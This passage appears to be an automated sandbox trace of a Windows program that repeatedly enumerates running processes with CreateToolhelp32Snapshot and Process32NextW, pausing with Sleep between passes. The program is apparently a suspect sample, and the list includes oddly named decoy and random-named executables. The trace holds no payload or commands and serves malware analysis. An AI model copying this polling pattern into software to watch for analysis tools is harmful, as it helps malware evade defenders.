th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.195] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0130.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0130.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0130.199] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0130.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0130.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0130.202] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0130.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0130.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0130.206] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0130.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0130.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0130.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0130.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0130.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0130.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0130.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0130.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0130.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0130.304] CloseHandle (hObject=0xc4) returned 1 [0130.304] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.309] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0130.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0130.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0130.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0130.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0130.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0130.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0130.348] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0130.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0130.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0130.352] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0130.354] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0130.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0130.357] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0130.358] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0130.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0130.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0130.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0130.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.365] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0130.366] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0130.368] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0130.369] CloseHandle (hObject=0xbc) returned 1 [0130.369] Sleep (dwMilliseconds=0x12c) [0130.795] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.801] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.804] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.808] 